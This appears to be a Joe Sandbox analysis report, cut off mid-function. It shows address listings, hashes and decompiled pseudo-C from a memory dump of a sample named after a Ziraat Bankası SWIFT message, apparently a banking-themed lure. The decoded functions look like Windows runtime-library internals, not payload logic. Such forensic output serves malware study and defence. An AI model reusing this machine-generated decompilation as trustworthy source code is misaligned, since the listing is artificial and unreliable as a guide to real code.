                                                                    0x0190be0b
                                                                    0x0190be0d
                                                                    0x0190be0f
                                                                    0x0190be14
                                                                    0x0190be19
                                                                    0x0190be20
                                                                    0x0190be25
                                                                    0x0190be27
                                                                    0x0190be35
                                                                    0x0190be39
                                                                    0x0190be46
                                                                    0x0190be4f
                                                                    0x0190be54
                                                                    0x0190be56
                                                                    0x0190bef8
                                                                    0x0190bef8
                                                                    0x00000000
                                                                    0x0190be5c
                                                                    0x0190be5c
                                                                    0x0190be60
                                                                    0x00000000
                                                                    0x0190be66
                                                                    0x0190be66
                                                                    0x0190be7f
                                                                    0x0190be84
                                                                    0x0190be87
                                                                    0x0190be89
                                                                    0x0190be8b
                                                                    0x0190be99
                                                                    0x0190be9d
                                                                    0x0190bea0
                                                                    0x0190beac
                                                                    0x0190beaf
                                                                    0x0190beb1
                                                                    0x0190beb3
                                                                    0x0190beb3
                                                                    0x00000000
                                                                    0x0190bea2
                                                                    0x0190bea2
                                                                    0x00000000
                                                                    0x0190bea2
                                                                    0x0190be8d
                                                                    0x0190be8d
                                                                    0x0190be92
                                                                    0x00000000
                                                                    0x0190be92
                                                                    0x0190be8b
                                                                    0x0190be60
                                                                    0x0190be3b
                                                                    0x0190be3b
                                                                    0x0190be3e
                                                                    0x00000000
                                                                    0x0190be40
                                                                    0x0190be40
                                                                    0x0190be44
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190be44
                                                                    0x0190be3e
                                                                    0x0190be29
                                                                    0x0190be29
                                                                    0x00000000
                                                                    0x0190be29
                                                                    0x0190be27
                                                                    0x00000000
                                                                    0x018cfba7
                                                                    0x018cfba7
                                                                    0x018cfbab
                                                                    0x0190bf02
                                                                    0x018cfbb1
                                                                    0x018cfbb1
                                                                    0x018cfbb8
                                                                    0x018cfbbd
                                                                    0x018cfbbd
                                                                    0x018cfbbf
                                                                    0x018cfbbf
                                                                    0x018cfbc5
                                                                    0x018cfbcb
                                                                    0x018cfbf8
                                                                    0x018cfbf8
                                                                    0x018cfbfa
                                                                    0x00000000
                                                                    0x018cfc00
                                                                    0x018cfc00
                                                                    0x018cfc03
                                                                    0x00000000
                                                                    0x018cfc09
                                                                    0x018cfc09
                                                                    0x018cfc0f
                                                                    0x018cfc15
                                                                    0x018cfc23
                                                                    0x018cfc23
                                                                    0x018cfc25
                                                                    0x018cfc27
                                                                    0x018cfc75
                                                                    0x018cfc7c
                                                                    0x018cfc84
                                                                    0x00000000
                                                                    0x018cfc29
                                                                    0x018cfc29
                                                                    0x018cfc2d
                                                                    0x018cfc30
                                                                    0x0190bf0f
                                                                    0x00000000
                                                                    0x018cfc36
                                                                    0x018cfc38
                                                                    0x018cfc3b
                                                                    0x018cfc41
                                                                    0x0190bf17
                                                                    0x0190bf19
                                                                    0x0190bf48
                                                                    0x0190bf4b
                                                                    0x00000000
                                                                    0x0190bf1b
                                                                    0x0190bf22
                                                                    0x0190bf24
                                                                    0x0190bf26
                                                                    0x00000000
                                                                    0x0190bf2c
                                                                    0x0190bf37
                                                                    0x0190bf39
                                                                    0x0190bf3b
                                                                    0x00000000
                                                                    0x0190bf41
                                                                    0x0190bf41
                                                                    0x0190bf41
                                                                    0x0190bf41
                                                                    0x0190bf45
                                                                    0x00000000
                                                                    0x0190bf45
                                                                    0x0190bf3b
                                                                    0x0190bf26
                                                                    0x00000000
                                                                    0x018cfc47
                                                                    0x018cfc47
                                                                    0x018cfc49
                                                                    0x018cfcb2
                                                                    0x018cfcb4
                                                                    0x018cfcb6
                                                                    0x018cfcdc
                                                                    0x018cfcdc
                                                                    0x00000000
                                                                    0x018cfcb8
                                                                    0x018cfcc3
                                                                    0x018cfcc5
                                                                    0x018cfcc7
                                                                    0x00000000
                                                                    0x018cfcc9
                                                                    0x018cfcc9
                                                                    0x018cfccd
                                                                    0x00000000
                                                                    0x018cfccd
                                                                    0x018cfcc7
                                                                    0x00000000
                                                                    0x018cfc4b
                                                                    0x018cfc4b
                                                                    0x018cfc4e
                                                                    0x018cfc4e
                                                                    0x018cfc51
                                                                    0x018cfc51
                                                                    0x018cfc54
                                                                    0x018cfc5a
                                                                    0x018cfc5c
                                                                    0x018cfc5f
                                                                    0x018cfc61
                                                                    0x018cfc63
                                                                    0x018cfc65
                                                                    0x018cfc67
                                                                    0x018cfc6e
                                                                    0x018cfc72
                                                                    0x018cfc72
                                                                    0x018cfc72
                                                                    0x018cfc72
                                                                    0x018cfc67
                                                                    0x018cfc61
                                                                    0x00000000
                                                                    0x018cfc5a
                                                                    0x018cfc49
                                                                    0x018cfc41
                                                                    0x018cfc30
                                                                    0x018cfc27
                                                                    0x018cfc03
                                                                    0x018cfbcd
                                                                    0x018cfbd3
                                                                    0x018cfbd9
                                                                    0x018cfbdc
                                                                    0x018cfbde
                                                                    0x018cfc99
                                                                    0x018cfc9b
                                                                    0x018cfc9d
                                                                    0x018cfcd5
                                                                    0x018cfcd5
                                                                    0x018cfc89
                                                                    0x018cfc89
                                                                    0x00000000
                                                                    0x018cfc9f
                                                                    0x018cfc9f
                                                                    0x018cfca3
                                                                    0x00000000
                                                                    0x018cfca3
                                                                    0x00000000
                                                                    0x018cfbe4
                                                                    0x018cfbe4
                                                                    0x018cfbe4
                                                                    0x018cfbe4
                                                                    0x018cfbe9
                                                                    0x018cfbf2
                                                                    0x00000000
                                                                    0x018cfbf2
                                                                    0x018cfbde
                                                                    0x018cfbcb
                                                                    0x018cfbab
                                                                    0x018cfc8b
                                                                    0x018cfc8b
                                                                    0x018cfc8c
                                                                    0x018cfb80
                                                                    0x018cfb72
                                                                    0x018cfb5e
                                                                    0x018cfc8d
                                                                    0x018cfc91
                                                                    0x018cfadf
                                                                    0x018cfadf
                                                                    0x018cfae1
                                                                    0x018cfae4
                                                                    0x018cfae7
                                                                    0x018cfaec
                                                                    0x018cfaf8
                                                                    0x018cfb00
                                                                    0x018cfb07
                                                                    0x018cfb0f
                                                                    0x018cfb0f
                                                                    0x018cfb07
                                                                    0x00000000
                                                                    0x018cfaf8
                                                                    0x018cfadd

                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0190BE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    • Opcode ID: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                                                                    • Instruction ID: 409cd93add65739b97390d99a51716f2e49fad76829f47b14bc450a1928512df
                                                                    • Opcode Fuzzy Hash: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                                                                    • Instruction Fuzzy Hash: 95A10575B006168FFB26DB6CC450B7AB7A6AF44B14F04456EEB0ACB681DB34DE01CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 63%
                                                                    			E01892D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                    				signed char _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				signed int _v52;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t55;
                                                                    				signed int _t57;
                                                                    				signed int _t58;
                                                                    				char* _t62;
                                                                    				signed char* _t63;
                                                                    				signed char* _t64;
                                                                    				signed int _t67;
                                                                    				signed int _t72;
                                                                    				signed int _t77;
                                                                    				signed int _t78;
                                                                    				signed int _t88;
                                                                    				intOrPtr _t89;
                                                                    				signed char _t93;
                                                                    				signed int _t97;
                                                                    				signed int _t98;
                                                                    				signed int _t102;
                                                                    				signed int _t103;
                                                                    				intOrPtr _t104;
                                                                    				signed int _t105;
                                                                    				signed int _t106;
                                                                    				signed char _t109;
                                                                    				signed int _t111;
                                                                    				void* _t116;
                                                                    
                                                                    				_t102 = __edi;
                                                                    				_t97 = __edx;
                                                                    				_v12 = _v12 & 0x00000000;
                                                                    				_t55 =  *[fs:0x18];
                                                                    				_t109 = __ecx;
                                                                    				_v8 = __edx;
                                                                    				_t86 = 0;
                                                                    				_v32 = _t55;
                                                                    				_v24 = 0;
                                                                    				_push(__edi);
                                                                    				if(__ecx == 0x1985350) {
                                                                    					_t86 = 1;
                                                                    					_v24 = 1;
                                                                    					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                    				}
                                                                    				_t103 = _t102 | 0xffffffff;
                                                                    				if( *0x1987bc8 != 0) {
                                                                    					_push(0xc000004b);
                                                                    					_push(_t103);
                                                                    					E018D97C0();
                                                                    				}
                                                                    				if( *0x19879c4 != 0) {
                                                                    					_t57 = 0;
                                                                    				} else {
                                                                    					_t57 = 0x19879c8;
                                                                    				}
                                                                    				_v16 = _t57;
                                                                    				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                    					_t93 = _t109;
                                                                    					L23();
                                                                    				}
                                                                    				_t58 =  *_t109;
                                                                    				if(_t58 == _t103) {
                                                                    					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                    					_t58 = _t103;
                                                                    					if(__eflags == 0) {
                                                                    						_t93 = _t109;
                                                                    						E018C1624(_t86, __eflags);
                                                                    						_t58 =  *_t109;
                                                                    					}
                                                                    				}
                                                                    				_v20 = _v20 & 0x00000000;
                                                                    				if(_t58 != _t103) {
                                                                    					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                    				}
                                                                    				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                    				_t88 = _v16;
                                                                    				_v28 = _t104;
                                                                    				L9:
                                                                    				while(1) {
                                                                    					if(E018B7D50() != 0) {
                                                                    						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                    					} else {
                                                                    						_t62 = 0x7ffe0382;
                                                                    					}
                                                                    					if( *_t62 != 0) {
                                                                    						_t63 =  *[fs:0x30];
                                                                    						__eflags = _t63[0x240] & 0x00000002;
                                                                    						if((_t63[0x240] & 0x00000002) != 0) {
                                                                    							_t93 = _t109;
                                                                    							E0192FE87(_t93);
                                                                    						}
                                                                    					}
                                                                    					if(_t104 != 0xffffffff) {
                                                                    						_push(_t88);
                                                                    						_push(0);
                                                                    						_push(_t104);
                                                                    						_t64 = E018D9520();
                                                                    						goto L15;
                                                                    					} else {
                                                                    						while(1) {
                                                                    							_t97 =  &_v8;
                                                                    							_t64 = E018CE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                    							if(_t64 == 0x102) {
                                                                    								break;
                                                                    							}
                                                                    							_t93 =  *(_t109 + 4);
                                                                    							_v8 = _t93;
                                                                    							if((_t93 & 0x00000002) != 0) {
                                                                    								continue;
                                                                    							}
                                                                    							L15:
                                                                    							if(_t64 == 0x102) {
                                                                    								break;
                                                                    							}
                                                                    							_t89 = _v24;
                                                                    							if(_t64 < 0) {
                                                                    								E018EDF30(_t93, _t97, _t64);
                                                                    								_push(_t93);
                                                                    								_t98 = _t97 | 0xffffffff;
                                                                    								__eflags =  *0x1986901;
                                                                    								_push(_t109);
                                                                    								_v52 = _t98;
                                                                    								if( *0x1986901 != 0) {
                                                                    									_push(0);
                                                                    									_push(1);
                                                                    									_push(0);
                                                                    									_push(0x100003);
                                                                    									_push( &_v12);
                                                                    									_t72 = E018D9980();
                                                                    									__eflags = _t72;
                                                                    									if(_t72 < 0) {
                                                                    										_v12 = _t98 | 0xffffffff;
                                                                    									}
                                                                    								}
                                                                    								asm("lock cmpxchg [ecx], edx");
                                                                    								_t111 = 0;
                                                                    								__eflags = 0;
                                                                    								if(0 != 0) {
                                                                    									__eflags = _v12 - 0xffffffff;
                                                                    									if(_v12 != 0xffffffff) {
                                                                    										_push(_v12);
                                                                    										E018D95D0();
                                                                    									}
                                                                    								} else {
                                                                    									_t111 = _v12;
                                                                    								}
                                                                    								return _t111;
                                                                    							} else {
                                                                    								if(_t89 != 0) {
                                                                    									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                    									_t77 = E018B7D50();
                                                                    									__eflags = _t77;
                                                                    									if(_t77 == 0) {
                                                                    										_t64 = 0x7ffe0384;
                                                                    									} else {
                                                                    										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                    									}
                                                                    									__eflags =  *_t64;
                                                                    									if( *_t64 != 0) {
                                                                    										_t64 =  *[fs:0x30];
                                                                    										__eflags = _t64[0x240] & 0x00000004;
                                                                    										if((_t64[0x240] & 0x00000004) != 0) {
                                                                    											_t78 = E018B7D50();
                                                                    											__eflags = _t78;
                                                                    											if(_t78 == 0) {
                                                                    												_t64 = 0x7ffe0385;
                                                                    											} else {
                                                                    												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                    											}
                                                                    											__eflags =  *_t64 & 0x00000020;
                                                                    											if(( *_t64 & 0x00000020) != 0) {
                                                                    												_t64 = E01917016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								return _t64;
                                                                    							}
                                                                    						}
                                                                    						_t97 = _t88;
                                                                    						_t93 = _t109;
                                                                    						E0192FDDA(_t97, _v12);
                                                                    						_t105 =  *_t109;
                                                                    						_t67 = _v12 + 1;
                                                                    						_v12 = _t67;
                                                                    						__eflags = _t105 - 0xffffffff;
                                                                    						if(_t105 == 0xffffffff) {
                                                                    							_t106 = 0;
                                                                    							__eflags = 0;
                                                                    						} else {
                                                                    							_t106 =  *(_t105 + 0x14);
                                                                    						}
                                                                    						__eflags = _t67 - 2;
                                                                    						if(_t67 > 2) {
                                                                    							__eflags = _t109 - 0x1985350;
                                                                    							if(_t109 != 0x1985350) {
                                                                    								__eflags = _t106 - _v20;
                                                                    								if(__eflags == 0) {
                                                                    									_t93 = _t109;
                                                                    									E0192FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_push("RTL: Re-Waiting\n");
                                                                    						_push(0);
                                                                    						_push(0x65);
                                                                    						_v20 = _t106;
                                                                    						E01925720();
                                                                    						_t104 = _v28;
                                                                    						_t116 = _t116 + 0xc;
                                                                    						continue;
                                                                    					}
                                                                    				}
                                                                    			}




































                                                                    0x01892d8a
                                                                    0x01892d8a
                                                                    0x01892d92
                                                                    0x01892d96
                                                                    0x01892d9e
                                                                    0x01892da0
                                                                    0x01892da3
                                                                    0x01892da5
                                                                    0x01892da8
                                                                    0x01892dab
                                                                    0x01892db2
                                                                    0x018ef9aa
                                                                    0x018ef9ab
                                                                    0x018ef9ae
                                                                    0x018ef9ae
                                                                    0x01892db8
                                                                    0x01892dc2
                                                                    0x018ef9b9
                                                                    0x018ef9be
                                                                    0x018ef9bf
                                                                    0x018ef9bf
                                                                    0x01892dcf
                                                                    0x018ef9c9
                                                                    0x01892dd5
                                                                    0x01892dd5
                                                                    0x01892dd5
                                                                    0x01892dde
                                                                    0x01892de1
                                                                    0x01892e70
                                                                    0x01892e72
                                                                    0x01892e72
                                                                    0x01892de7
                                                                    0x01892deb
                                                                    0x01892e7c
                                                                    0x01892e83
                                                                    0x01892e85
                                                                    0x01892e8b
                                                                    0x01892e8d
                                                                    0x01892e92
                                                                    0x01892e92
                                                                    0x01892e85
                                                                    0x01892df1
                                                                    0x01892df7
                                                                    0x01892df9
                                                                    0x01892df9
                                                                    0x01892dfc
                                                                    0x01892dff
                                                                    0x01892e02
                                                                    0x00000000
                                                                    0x01892e05
                                                                    0x01892e0c
                                                                    0x018ef9d9
                                                                    0x01892e12
                                                                    0x01892e12
                                                                    0x01892e12
                                                                    0x01892e1a
                                                                    0x018ef9e3
                                                                    0x018ef9e9
                                                                    0x018ef9f0
                                                                    0x018ef9f6
                                                                    0x018ef9f8
                                                                    0x018ef9f8
                                                                    0x018ef9f0
                                                                    0x01892e23
                                                                    0x018efa02
                                                                    0x018efa03
                                                                    0x018efa05
                                                                    0x018efa06
                                                                    0x00000000
                                                                    0x01892e29
                                                                    0x01892e29
                                                                    0x01892e2e
                                                                    0x01892e34
                                                                    0x01892e3e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01892e44
                                                                    0x01892e47
                                                                    0x01892e4d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01892e4f
                                                                    0x01892e54
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01892e5a
                                                                    0x01892e5f
                                                                    0x01892e9a
                                                                    0x01892ea4
                                                                    0x01892ea5
                                                                    0x01892ea8
                                                                    0x01892eaf
                                                                    0x01892eb2
                                                                    0x01892eb5
                                                                    0x018efae9
                                                                    0x018efaeb
                                                                    0x018efaed
                                                                    0x018efaef
                                                                    0x018efaf7
                                                                    0x018efaf8
                                                                    0x018efafd
                                                                    0x018efaff
                                                                    0x018efb04
                                                                    0x018efb04
                                                                    0x018efaff
                                                                    0x01892ec0
                                                                    0x01892ec4
                                                                    0x01892ec6
                                                                    0x01892ec8
                                                                    0x018efb14
                                                                    0x018efb18
                                                                    0x018efb1e
                                                                    0x018efb21
                                                                    0x018efb21
                                                                    0x01892ece
                                                                    0x01892ece
                                                                    0x01892ece
                                                                    0x01892ed7
                                                                    0x01892e61
                                                                    0x01892e63
                                                                    0x018efa6b
                                                                    0x018efa71
                                                                    0x018efa76
                                                                    0x018efa78
                                                                    0x018efa8a
                                                                    0x018efa7a
                                                                    0x018efa83
                                                                    0x018efa83
                                                                    0x018efa8f
                                                                    0x018efa91
                                                                    0x018efa97
                                                                    0x018efa9d
                                                                    0x018efaa4
                                                                    0x018efaaa
                                                                    0x018efaaf
                                                                    0x018efab1
                                                                    0x018efac3
                                                                    0x018efab3
                                                                    0x018efabc
                                                                    0x018efabc
                                                                    0x018efac8
                                                                    0x018efacb
                                                                    0x018efadf
                                                                    0x018efadf
                                                                    0x018efacb
                                                                    0x018efaa4
                                                                    0x018efa91
                                                                    0x01892e6f
                                                                    0x01892e6f
                                                                    0x01892e5f
                                                                    0x018efa13
                                                                    0x018efa15
                                                                    0x018efa17
                                                                    0x018efa1f
                                                                    0x018efa21
                                                                    0x018efa22
                                                                    0x018efa25
                                                                    0x018efa28
                                                                    0x018efa2f
                                                                    0x018efa2f
                                                                    0x018efa2a
                                                                    0x018efa2a
                                                                    0x018efa2a
                                                                    0x018efa31
                                                                    0x018efa34
                                                                    0x018efa36
                                                                    0x018efa3c
                                                                    0x018efa3e
                                                                    0x018efa41
                                                                    0x018efa43
                                                                    0x018efa45
                                                                    0x018efa45
                                                                    0x018efa41
                                                                    0x018efa3c
                                                                    0x018efa4a
                                                                    0x018efa4f
                                                                    0x018efa51
                                                                    0x018efa53
                                                                    0x018efa56
                                                                    0x018efa5b
                                                                    0x018efa5e
                                                                    0x00000000
                                                                    0x018efa5e
                                                                    0x01892e23

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    • Opcode ID: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                                                                    • Instruction ID: 0ff1b130eab411ce3d4b9e3af4227e81f1072e0ed47c1b9616c6a145b49951f7
                                                                    • Opcode Fuzzy Hash: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                                                                    • Instruction Fuzzy Hash: 01610671A00649AFEB32DF6CC888B7E7BE6EB45718F180659E615DB2C2C7349B008781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E01960EA5(void* __ecx, void* __edx) {
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _v28;
                                                                    				unsigned int _v32;
                                                                    				signed int _v36;
                                                                    				intOrPtr _v40;
                                                                    				char _v44;
                                                                    				intOrPtr _v64;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed int _t58;
                                                                    				unsigned int _t60;
                                                                    				intOrPtr _t62;
                                                                    				char* _t67;
                                                                    				char* _t69;
                                                                    				void* _t80;
                                                                    				void* _t83;
                                                                    				intOrPtr _t93;
                                                                    				intOrPtr _t115;
                                                                    				char _t117;
                                                                    				void* _t120;
                                                                    
                                                                    				_t83 = __edx;
                                                                    				_t117 = 0;
                                                                    				_t120 = __ecx;
                                                                    				_v44 = 0;
                                                                    				if(E0195FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                    					L24:
                                                                    					_t109 = _v44;
                                                                    					if(_v44 != 0) {
                                                                    						E01961074(_t83, _t120, _t109, _t117, _t117);
                                                                    					}
                                                                    					L26:
                                                                    					return _t117;
                                                                    				}
                                                                    				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                    				_t5 = _t83 + 1; // 0x1
                                                                    				_v36 = _t5 << 0xc;
                                                                    				_v40 = _t93;
                                                                    				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                    				asm("sbb ebx, ebx");
                                                                    				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                    				if(_t58 != 0) {
                                                                    					_push(0);
                                                                    					_push(0x14);
                                                                    					_push( &_v24);
                                                                    					_push(3);
                                                                    					_push(_t93);
                                                                    					_push(0xffffffff);
                                                                    					_t80 = E018D9730();
                                                                    					_t115 = _v64;
                                                                    					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                    						_push(_t93);
                                                                    						E0195A80D(_t115, 1, _v20, _t117);
                                                                    						_t83 = 4;
                                                                    					}
                                                                    				}
                                                                    				if(E0195A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                    					goto L24;
                                                                    				}
                                                                    				_t60 = _v32;
                                                                    				_t97 = (_t60 != 0x100000) + 1;
                                                                    				_t83 = (_v44 -  *0x1988b04 >> 0x14) + (_v44 -  *0x1988b04 >> 0x14);
                                                                    				_v28 = (_t60 != 0x100000) + 1;
                                                                    				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                    				_v40 = _t62;
                                                                    				if(_t83 >= _t62) {
                                                                    					L10:
                                                                    					asm("lock xadd [eax], ecx");
                                                                    					asm("lock xadd [eax], ecx");
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t67 = 0x7ffe0380;
                                                                    					} else {
                                                                    						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    					}
                                                                    					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                    						E0195138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                    					}
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t69 = 0x7ffe0388;
                                                                    					} else {
                                                                    						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    					}
                                                                    					if( *_t69 != 0) {
                                                                    						E0194FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                    					}
                                                                    					if(( *0x1988724 & 0x00000008) != 0) {
                                                                    						E019552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                    					}
                                                                    					_t117 = _v44;
                                                                    					goto L26;
                                                                    				}
                                                                    				while(E019615B5(0x1988ae4, _t83, _t97, _t97) >= 0) {
                                                                    					_t97 = _v28;
                                                                    					_t83 = _t83 + 2;
                                                                    					if(_t83 < _v40) {
                                                                    						continue;
                                                                    					}
                                                                    					goto L10;
                                                                    				}
                                                                    				goto L24;
                                                                    			}
























                                                                    0x01960eb7
                                                                    0x01960eb9
                                                                    0x01960ec0
                                                                    0x01960ec2
                                                                    0x01960ecd
                                                                    0x0196105b
                                                                    0x0196105b
                                                                    0x01961061
                                                                    0x01961066
                                                                    0x01961066
                                                                    0x0196106b
                                                                    0x01961073
                                                                    0x01961073
                                                                    0x01960ed3
                                                                    0x01960ed6
                                                                    0x01960edc
                                                                    0x01960ee0
                                                                    0x01960ee7
                                                                    0x01960ef0
                                                                    0x01960ef5
                                                                    0x01960efa
                                                                    0x01960efc
                                                                    0x01960efd
                                                                    0x01960f03
                                                                    0x01960f04
                                                                    0x01960f06
                                                                    0x01960f07
                                                                    0x01960f09
                                                                    0x01960f0e
                                                                    0x01960f14
                                                                    0x01960f23
                                                                    0x01960f2d
                                                                    0x01960f34
                                                                    0x01960f34
                                                                    0x01960f14
                                                                    0x01960f52
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01960f58
                                                                    0x01960f73
                                                                    0x01960f74
                                                                    0x01960f79
                                                                    0x01960f7d
                                                                    0x01960f80
                                                                    0x01960f86
                                                                    0x01960fab
                                                                    0x01960fb5
                                                                    0x01960fc6
                                                                    0x01960fd1
                                                                    0x01960fe3
                                                                    0x01960fd3
                                                                    0x01960fdc
                                                                    0x01960fdc
                                                                    0x01960feb
                                                                    0x01961009
                                                                    0x01961009
                                                                    0x01961015
                                                                    0x01961027
                                                                    0x01961017
                                                                    0x01961020
                                                                    0x01961020
                                                                    0x0196102f
                                                                    0x0196103c
                                                                    0x0196103c
                                                                    0x01961048
                                                                    0x01961050
                                                                    0x01961050
                                                                    0x01961055
                                                                    0x00000000
                                                                    0x01961055
                                                                    0x01960f88
                                                                    0x01960f9e
                                                                    0x01960fa2
                                                                    0x01960fa9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01960fa9
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                                                                    • Instruction ID: 6091ea35545fdb4a94084e44e8140e8ecd5856ea3192f874c8c17f67712c6137
                                                                    • Opcode Fuzzy Hash: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                                                                    • Instruction Fuzzy Hash: B851AE713043829FE725DF28D980B1BBBE9EBC4714F08492CFA9A97290D770E805C762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E018CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				char* _v20;
                                                                    				intOrPtr _v24;
                                                                    				char _v28;
                                                                    				intOrPtr _v32;
                                                                    				char _v36;
                                                                    				char _v44;
                                                                    				char _v52;
                                                                    				intOrPtr _v56;
                                                                    				char _v60;
                                                                    				intOrPtr _v72;
                                                                    				void* _t51;
                                                                    				void* _t58;
                                                                    				signed short _t82;
                                                                    				short _t84;
                                                                    				signed int _t91;
                                                                    				signed int _t100;
                                                                    				signed short* _t103;
                                                                    				void* _t108;
                                                                    				intOrPtr* _t109;
                                                                    
                                                                    				_t103 = __ecx;
                                                                    				_t82 = __edx;
                                                                    				_t51 = E018B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                    				if(_t51 >= 0) {
                                                                    					_push(0x21);
                                                                    					_push(3);
                                                                    					_v56 =  *0x7ffe02dc;
                                                                    					_v20 =  &_v52;
                                                                    					_push( &_v44);
                                                                    					_v28 = 0x18;
                                                                    					_push( &_v28);
                                                                    					_push(0x100020);
                                                                    					_v24 = 0;
                                                                    					_push( &_v60);
                                                                    					_v16 = 0x40;
                                                                    					_v12 = 0;
                                                                    					_v8 = 0;
                                                                    					_t58 = E018D9830();
                                                                    					_t87 =  *[fs:0x30];
                                                                    					_t108 = _t58;
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                    					if(_t108 < 0) {
                                                                    						L11:
                                                                    						_t51 = _t108;
                                                                    					} else {
                                                                    						_push(4);
                                                                    						_push(8);
                                                                    						_push( &_v36);
                                                                    						_push( &_v44);
